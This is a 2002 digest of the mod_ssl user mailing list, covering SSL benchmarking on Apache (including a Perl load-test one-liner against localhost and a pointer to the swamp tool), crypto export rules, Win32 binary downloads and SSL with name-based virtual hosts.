> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 21:33:48 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA14296; Thu, 26 Sep 2002 21:32:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SOTTMXS01.entrust.com id VAA14285; Thu, 26 Sep 2002 21:31:59 +0200 (MET DST)
Received: by SOTTMXS01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Thu, 26 Sep 2002 15:31:52 -0400
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: How to Benchmark SSL on Apache based servers?
Date: Thu, 26 Sep 2002 15:31:51 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26593.5CF3E1C0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C26593.5CF3E1C0
Content-Type: text/plain


Hi,

Is it possible to benchmark the server load with mod_ssl enabled on Apache?

Is there particular software that can do this?

Thanks,
Rob

------_=_NextPart_001_01C26593.5CF3E1C0
Content-Type: text/html






How to Benchmark SSL on Apache based servers?






Hi,




Is it possible to benchmark the server load with mod_ssl enabled on Apache?




Is there particular software that can do this?




Thanks,

Rob





------_=_NextPart_001_01C26593.5CF3E1C0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 21:40:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA14454; Thu, 26 Sep 2002 21:38:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id VAA14447; Thu, 26 Sep 2002 21:37:43 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KMYX8U1S6800QFZH@mdx.ac.uk> for modssl-users@modssl.org; Thu,
 26 Sep 2002 20:37:54 +0100 (BST)
Received: from mdx-nwsup1.nw.mdx.ac.uk (mdx-nwsup1.mdx.ac.uk [158.94.57.9])
 by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KMYX8QEU9K00OW9A@mdx.ac.uk>
 for modssl-users@modssl.org; Thu, 26 Sep 2002 20:37:48 +0100 (BST)
Received: from MDX-NWSUP1/SpoolDir by mdx-nwsup1.nw.mdx.ac.uk (Mercury 1.48)
 ; Thu, 26 Sep 2002 20:34:42 +0000
Received: from SpoolDir by MDX-NWSUP1 (Mercury 1.48); Thu,
 26 Sep 2002 20:34:40 +0000
Date: Thu, 26 Sep 2002 20:34:32 +0000
From: a.moon@mdx.ac.uk
Subject: How to Benchmark SSL on Apache based servers?
To: modssl-users@modssl.org
Message-id: <24249B11E9F@mdx-nwsup1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Due to unaviodable circumstances, I am away from the office until the Monday 30th September 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

If the problem relates to mubsweb please contact sanjay1
If the probelm relates to OASIS or WebCT please contact Kirsteen1
If your query  relates to mbs1111 or it support please contact Jeff1

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 27 05:12:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA25200; Fri, 27 Sep 2002 05:11:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from campbus.com id FAA25195; Fri, 27 Sep 2002 05:10:09 +0200 (MET DST)
Received: from campbus ([192.168.1.110])
	by campbus.com (8.9.3/8.9.3) with SMTP id WAA32520
	for ; Thu, 26 Sep 2002 22:41:45 -0400
Message-ID: <002501c265d2$f72611c0$6e01a8c0@cbs>
From: "Ken Campney" 
To: 
References:  <000f01c264fc$8f49a660$6e01a8c0@cbs> <3D92700F.90801@sympatico.ca> <002f01c26506$5b9e37e0$6e01a8c0@cbs> <006701c26507$658cd4e0$6e01a8c0@cbs> <3D929FA3.6050107@sympatico.ca> <00ab01c26525$fa4ada00$6e01a8c0@cbs>
Subject: Re: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
Date: Thu, 26 Sep 2002 23:07:07 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Campney" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

To everybody following this discussion, I have located the following :)

This information was obtained from
http://www.bis.doc.gov/Encryption/EncFAQs6_17_02.html#6

When is a "review request" or "notification" NOT required?

No review or notification is required to export any encryption item to
overseas subsidiaries of U.S. companies (except subsidiaries in Cuba, Iran,
Iraq, Libya, North Korea, Sudan and Syria - this includes "exports" and
"reexports," as defined by Section 734.2 of the EAR, of encryption source
code and technology to foreign nationals of these countries) for internal
company use, including the development of new products. Likewise, no review
or notification is required for encryption items with limited cryptographic
capabilities described in the Technical and Related Control notes under ECCN
5A002 of Category 5, Part 2 ("Information Security") of the Commerce Control
List (Supplement No. 1 to Part 774 of the EAR), such as authentication,
access control, digital signature, copy protection, banking use or money
transactions

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 27 14:48:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA06956; Fri, 27 Sep 2002 14:47:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id OAA06908; Fri, 27 Sep 2002 14:46:35 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6489B4CE768; Fri, 27 Sep 2002 14:46:36 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 5C3872882A; Fri, 27 Sep 2002 14:46:28 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.getnet.net id OAA06204; Fri, 27 Sep 2002 14:11:57 +0200 (MET DST)
Received: (qmail 9612 invoked from network); 27 Sep 2002 12:11:50 -0000
Received: from jgundsl.redback.inficad.com (HELO inficad.com) (207.55.71.25)
  by 0 with SMTP; 27 Sep 2002 12:11:50 -0000
Message-ID: <3D944A6B.E970623F@inficad.com>
Date: Fri, 27 Sep 2002 05:09:15 -0700
From: Jeff Hagan 
X-Mailer: Mozilla 4.75 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Availability of mod_ssl for Apache 2.0.42  Win32
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeff Hagan 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Does anyone know when a release of mod_ssl supporting Apache 2.0.42 for
Win32 will be available?


Thank you,

--
jeff h.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 27 15:12:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA08334; Fri, 27 Sep 2002 15:11:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts11-srv.bellnexxia.net id PAA08326; Fri, 27 Sep 2002 15:10:41 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts11-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020927131040.XGDH23451.tomts11-srv.bellnexxia.net@sympatico.ca>
          for ; Fri, 27 Sep 2002 09:10:40 -0400
Message-ID: <3D9458DF.6000003@sympatico.ca>
Date: Fri, 27 Sep 2002 09:10:55 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Availability of mod_ssl for Apache 2.0.42  Win32
References: <3D944A6B.E970623F@inficad.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Jeff Hagan wrote:
> Does anyone know when a release of mod_ssl supporting Apache 2.0.42 for
> Win32 will be available?
> 
> 
> Thank you,
> 
> --
> jeff h.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Jeff,

mod_ssl is integrated/included  (built in) with Apache 2.0.x

It is no longer a separate package.

Chris.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 27 20:34:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA16439; Fri, 27 Sep 2002 20:33:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA16434; Fri, 27 Sep 2002 20:32:51 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 214D04CE743; Fri, 27 Sep 2002 20:32:52 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8A98F285C7; Fri, 27 Sep 2002 20:21:34 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from adsl-gte-la-216-86-196-126.mminternet.com id TAA14876; Fri, 27 Sep 2002 19:28:26 +0200 (MET DST)
Received: from chamas.com (by adsl-gte-la-216-86-196-126.mminternet.com (8.11.6/8.11.6) with ESMTP id g8RHSNA13548
	for ; Fri, 27 Sep 2002 10:28:24 -0700
Message-ID: <3D949536.3040808@chamas.com>
Date: Fri, 27 Sep 2002 10:28:22 -0700
From: Josh Chamas 
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en,ja
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: How to Benchmark SSL on Apache based servers?
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Josh Chamas 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Robert Lagana wrote:
> 
> Hi,
> 
> Is it possible to benchmark the server load with mod_ssl enabled on Apache?
> 
> Is there particular software that can do this?
> 

In perl, you could do this by scripting a quick benchmark
with LWP & Crypt::SSLeay libraries. ( LWP loads Crypt::SSLeay
on the backend for https URLs )

Here's a crude command that will set 2 web clients hitting
your SSL server at the same time:

]$ perl -MLWP::Simple -MBenchmark -e 'fork; timethis(25, sub { get(qq(https://localhost/)); }); wait;'
timethis 25: 11 wallclock secs ( 2.78 usr +  0.07 sys =  2.85 CPU) @  8.77/s (n=25)
timethis 25: 11 wallclock secs ( 3.03 usr +  0.07 sys =  3.10 CPU) @  8.06/s (n=25)

The timethis() stats aren't really relevant in this case, but
it gave 50 requests done in 11 seconds.  Obviously, since the
client was running on the same machine as the server, the servers
real performance would be quite different by itself.

Regards,

Josh
________________________________________________________________
Josh Chamas, Founder                   phone:925-552-0128
Chamas Enterprises Inc.                http://www.chamas.com
NodeWorks Link Checking                http://www.nodeworks.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 27 21:11:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA16915; Fri, 27 Sep 2002 21:10:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SOTTMXS01.entrust.com id VAA16901; Fri, 27 Sep 2002 21:09:31 +0200 (MET DST)
Received: by SOTTMXS01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Fri, 27 Sep 2002 14:53:45 -0400
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: RE: How to Benchmark SSL on Apache based servers?
Date: Fri, 27 Sep 2002 14:53:44 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26657.340C3B80"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C26657.340C3B80
Content-Type: text/plain

Thanks !

-----Original Message-----
From: Josh Chamas [mailto:josh@chamas.com]
Sent: Friday, September 27, 2002 1:28 PM
To: modssl-users@modssl.org
Subject: Re: How to Benchmark SSL on Apache based servers?


Robert Lagana wrote:
> 
> Hi,
> 
> Is it possible to benchmark the server load with mod_ssl enabled on
Apache?
> 
> Is there particular software that can do this?
> 

In perl, you could do this by scripting a quick benchmark
with LWP & Crypt::SSLeay libraries. ( LWP loads Crypt::SSLeay
on the backend for https URLs )

Here's a crude command that will set 2 web clients hitting
your SSL server at the same time:

]$ perl -MLWP::Simple -MBenchmark -e 'fork; timethis(25, sub {
get(qq(https://localhost/)); }); wait;'
timethis 25: 11 wallclock secs ( 2.78 usr +  0.07 sys =  2.85 CPU) @  8.77/s
(n=25)
timethis 25: 11 wallclock secs ( 3.03 usr +  0.07 sys =  3.10 CPU) @  8.06/s
(n=25)

The timethis() stats aren't really relevant in this case, but
it gave 50 requests done in 11 seconds.  Obviously, since the
client was running on the same machine as the server, the servers
real performance would be quite different by itself.

Regards,

Josh
________________________________________________________________
Josh Chamas, Founder                   phone:925-552-0128
Chamas Enterprises Inc.                http://www.chamas.com
NodeWorks Link Checking                http://www.nodeworks.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C26657.340C3B80
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






RE: How to Benchmark SSL on Apache based servers?




Thanks !




-----Original Message-----

From: Josh Chamas [mailto:josh@chamas.com]

Sent: Friday, September 27, 2002 1:28 PM

To: modssl-users@modssl.org

Subject: Re: How to Benchmark SSL on Apache based =
servers?






Robert Lagana wrote:

> 

> Hi,

> 

> Is it possible to benchmark the server load =
with mod_ssl enabled on Apache?

> 

> Is there particular software that can do =
this?

> 




In perl, you could do this by scripting a quick =
benchmark

with LWP & Crypt::SSLeay libraries. ( LWP loads =
Crypt::SSLeay

on the backend for https URLs )




Here's a crude command that will set 2 web clients =
hitting

your SSL server at the same time:




]$ perl -MLWP::Simple -MBenchmark -e 'fork; =
timethis(25, sub { get(qq(https://localhost/)); }); wait;'

timethis 25: 11 wallclock secs ( 2.78 usr +  =
0.07 sys =3D  2.85 CPU) @  8.77/s (n=3D25)

timethis 25: 11 wallclock secs ( 3.03 usr +  =
0.07 sys =3D  3.10 CPU) @  8.06/s (n=3D25)




The timethis() stats aren't really relevant in this =
case, but

it gave 50 requests done in 11 seconds.  =
Obviously, since the

client was running on the same machine as the =
server, the servers

real performance would be quite different by =
itself.




Regards,




Josh

_______________________________________________________________=
_

Josh Chamas, =
Founder           =
;        phone:925-552-0128

Chamas Enterprises =
Inc.           &n=
bsp;    http://www.chamas.com

NodeWorks Link =
Checking          &nbs=
p;     http://www.nodeworks.com

_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C26657.340C3B80--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 27 21:35:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA17724; Fri, 27 Sep 2002 21:34:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from VL-MS-MR001.sc1.videotron.ca id VAA17718; Fri, 27 Sep 2002 21:33:25 +0200 (MET DST)
Received: from toilet ([24.202.231.9]) by VL-MS-MR001.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 0.9 (built Jul 29 2002))
 with ESMTP id <0H340088N3NJQ8@VL-MS-MR001.sc1.videotron.ca> for
 modssl-users@modssl.org; Fri, 27 Sep 2002 15:33:20 -0400 (EDT)
Received: from toilet	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))	id 17v0rQ-0000Uv-00; Fri,
 27 Sep 2002 15:33:12 -0400
Date: Fri, 27 Sep 2002 15:33:12 -0400 (EDT)
From: Geoff Thorpe 
Subject: Re: How to Benchmark SSL on Apache based servers?
In-reply-to: <3D949536.3040808@chamas.com>
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
Content-type: TEXT/PLAIN; charset=US-ASCII
Content-transfer-encoding: 7BIT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hey there,

On Fri, 27 Sep 2002, Josh Chamas wrote:

> Robert Lagana wrote:
> >
> > Hi,
> >
> > Is it possible to benchmark the server load with mod_ssl enabled on Apache?
> >
> > Is there particular software that can do this?
> >
>
> In perl, you could do this by scripting a quick benchmark
> with LWP & Crypt::SSLeay libraries. ( LWP loads Crypt::SSLeay
> on the backend for https URLs )
>
> Here's a crude command that will set 2 web clients hitting
> your SSL server at the same time:
>
> ]$ perl -MLWP::Simple -MBenchmark -e 'fork; timethis(25, sub { get(qq(https://localhost/)); }); wait;'
> timethis 25: 11 wallclock secs ( 2.78 usr +  0.07 sys =  2.85 CPU) @  8.77/s (n=25)
> timethis 25: 11 wallclock secs ( 3.03 usr +  0.07 sys =  3.10 CPU) @  8.06/s (n=25)
>
> The timethis() stats aren't really relevant in this case, but
> it gave 50 requests done in 11 seconds.  Obviously, since the
> client was running on the same machine as the server, the servers
> real performance would be quite different by itself.

heh :-)

There is another solution out there (shameless plug);
   http://www.geoffthorpe.net/crypto/swamp/

This will also let you mess around with combinations of session resume
(attempts) from the client requests - something important if you're trying
to simulate more or less the profile of traffic you expect a server to be
hit with in real life. Hitting it with nothing but a barrage of SSL/TLS
session negotiations is doing little more than determining what it would
take to DoS your server, which is perhaps not the only information you're
looking for.

BTW: The README may be useful even if you don't want to use swamp - it's
online at;
   http://www.geoffthorpe.net/crypto/swamp/swamp-1.1.0/README

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 04:26:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA25758; Sat, 28 Sep 2002 04:25:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts11-srv.bellnexxia.net id EAA25753; Sat, 28 Sep 2002 04:24:49 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts11-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020928022448.SORC23451.tomts11-srv.bellnexxia.net@sympatico.ca>
          for ; Fri, 27 Sep 2002 22:24:48 -0400
Message-ID: <3D951302.3080807@sympatico.ca>
Date: Fri, 27 Sep 2002 22:25:06 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Windows binaries for Apache
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Apache users...

In response to requests for Windows binaries, I built Apache 1.3.26 with 
mod_ssl 2.8.10 and OpenSSL 0.9.6g.  However, I was unable to upload the 
files to the mod_ssl contrib site and offered to temporarily host the 
files on my server.  I am limited in how long I can do this since my ISP 
will charge me dollars/GB after 10GB of downloads per month.  I will not 
be removing the binaries from my server unless I am in danger of 
exceeding the limit.

Ken Campney generously offered to host these files, so that they can 
continue to be available.  The new links are listed below.

http://hunter.campbus.com/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
http://hunter.campbus.com/Openssl-0.9.6g-Win32.zip

http://hunter.campbus.com/Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip

Please use the links above instead of my server...
http://tor.ath.cx/~hunter/apache

I will continue to provide you with new binaries if the sources change 
and there is continued interest in Apache 1.3.xx

Please download from the hunter.campbus.com location if possible.

If you have any problems contact me on the list, as 
 or at my personal account: hunter@tor.ath.cx

Chris.


Legal Notice
------------

These packagages use strong cryptography that is regulated by 
export/import/use restrictions in some other parts of the world and are 
provided free of charge.

PLEASE REMEMBER THAT EXPORT/IMPORT AND/OR USE OF STRONG CRYPTOGRAPHY 
SOFTWARE, PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING 
TECHNICAL DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS 
OF THE WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY, 
RE-DISTRIBUTE IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR 
EVEN SOURCE PATCHES TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY 
ADVISED TO PAY CLOSE ATTENTION TO ANY EXPORT/IMPORT AND/OR USE LAWS 
WHICH APPLY TO YOU. WE NOR THE AUTHORS OF THE REPRESENTED SOFTWARE 
PACKAGES ARE OR WILL BE HELD LIABLE FOR ANY VIOLATIONS YOU MAKE. BE 
CAREFUL, IT IS YOUR RESPONSIBILITY.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 05:15:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA26743; Sat, 28 Sep 2002 05:14:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from persephone.cfrq.net id FAA26737; Sat, 28 Sep 2002 05:13:12 +0200 (MET DST)
Received: from elisabeth.cfrq.net (elisabeth.chk.cfrq.net [199.85.99.82] (may be forged))
	by persephone.cfrq.net (8.12.2/8.12.2) with ESMTP id g8S3D8mR000397
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK)
	for ; Fri, 27 Sep 2002 23:13:09 -0400
Received: from elisabeth.cfrq.net (localhost [127.0.0.1])
	by elisabeth.cfrq.net (8.12.2/8.12.2) with ESMTP id g8S3D2Fm014859
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for ; Fri, 27 Sep 2002 23:13:04 -0400
Received: from elisabeth.cfrq.net (chk@localhost)
	by elisabeth.cfrq.net (8.12.2/8.12.2/Submit) with ESMTP id g8S3Cu6Y014855
	for ; Fri, 27 Sep 2002 23:13:00 -0400
X-Authentication-Warning: elisabeth.cfrq.net: chk owned process doing -bs
To: modssl-users@modssl.org
Subject: Re: Is anyone doing this!?! 
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela>
            
In-reply-to: Your message of "Thu, 26 Sep 2002 01:30:29 +0200".
	  
From: Harald Koch 
X-uri: 
X-Face: )@F:jK?*}hv!eJ}*r*0DD"k8x1.d#i>7`ETe2;hSD2T!:Fh#wu`0pW7lO|Dfe'AbyNy[\Pw
 z'.bAtgTM!+iq2$yXiv4gf<:D*rZ-|f$\YQi7"D"=CG!JB?[^_7v>8Mm;z:NJ7pss)l__Cw+.>xUJ)
 did@Pr9
Date: Fri, 27 Sep 2002 23:12:54 -0400
Message-ID: <14854.1033182774@elisabeth.cfrq.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Harald Koch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Of all the gin joints in all the towns in all the world, Tim Tassonis
had to walk into mine and say:
> 
> If you are talking about Name Based Virtual Hosts (same ip:port, but
> different names) you are out of luck. You can't present different
> certificates with Name Based Virtual Hosts, because the Hostname is not
> known by the server at the time it should present the certificate.

SubjectAltName?

-- 
Harald Koch     

"It takes a child to raze a village."
		-Michael T. Fry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 28 16:52:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA09053; Sat, 28 Sep 2002 16:51:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sccrmhc02.attbi.com id QAA09046; Sat, 28 Sep 2002 16:50:32 +0200 (MET DST)
Received: from Allen ([24.245.48.155]) by sccrmhc02.attbi.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020928145021.OPYC27763.sccrmhc02.attbi.com@Allen>
          for ; Sat, 28 Sep 2002 14:50:21 +0000
Message-ID: <001401c266fe$74a82c60$9b30f518@ce1.client2.attbi.com>
From: "Chris Allen" 
To: 
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela>             <14854.1033182774@elisabeth.cfrq.net>
Subject: Re: Is anyone doing this!?! 
Date: Sat, 28 Sep 2002 09:50:58 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Allen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hey all,

I am missing something in my understanding. Many people have asked this
question countless times.
Is this something that mod_ssl needs or is this a apache(etc) related
problem? Is there ever going to be a way to do name based virtual hosting
with apache and mod_ssl?


"because the Hostname is not known by the server at the time it should
present the certificate."

Surely this isnt as trivial as it sounds? How about we let the server know
the hostname?


Thanks for any info.
------------------------------------------------
-ccma Supreme Being of Leisure


----- Original Message -----
From: "Harald Koch" 
To: 
Sent: Friday, September 27, 2002 10:12 PM
Subject: Re: Is anyone doing this!?!


>
> Of all the gin joints in all the towns in all the world, Tim Tassonis
> had to walk into mine and say:
> >
> > If you are talking about Name Based Virtual Hosts (same ip:port, but
> > different names) you are out of luck. You can't present different
> > certificates with Name Based Virtual Hosts, because the Hostname is not
> > known by the server at the time it should present the certificate.
>
> SubjectAltName?
>
> --
> Harald Koch     
>
